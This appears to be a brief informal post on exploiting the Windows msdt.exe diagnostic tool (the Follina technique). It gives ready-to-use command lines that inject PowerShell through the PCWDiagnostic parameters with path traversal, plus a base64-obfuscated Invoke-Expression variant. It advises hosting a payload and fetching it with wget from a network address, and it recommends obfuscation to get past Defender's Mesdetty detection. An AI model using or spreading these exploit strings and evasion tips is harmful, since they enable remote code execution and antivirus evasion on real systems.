Just in case, you have access to a powershell, you can type in and load whatever payload you hosted on the internal or external network. As long as the payload is maked as .html, you can type "powershell -> wget http://192.168.2.234:4455" and in that moment the Diagnositc Tool starts to work.
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\""
Process Command Line: “C:\Windows\system32\msdt.exe” ms-msdt:/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression(‘[System.Text.Encoding]’+[char]58+[char]58+’UTF8.GetString([System.Convert]’+[char]58+[char]58+’FromBase64String(‘+[char]34+’Y2FsYw==’+[char]34+’))’))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe”
Because this now gets flagged as malicious activity (Trojan:Win32/Mesdetty.D), you have to convert to base64 or obfuscate the code.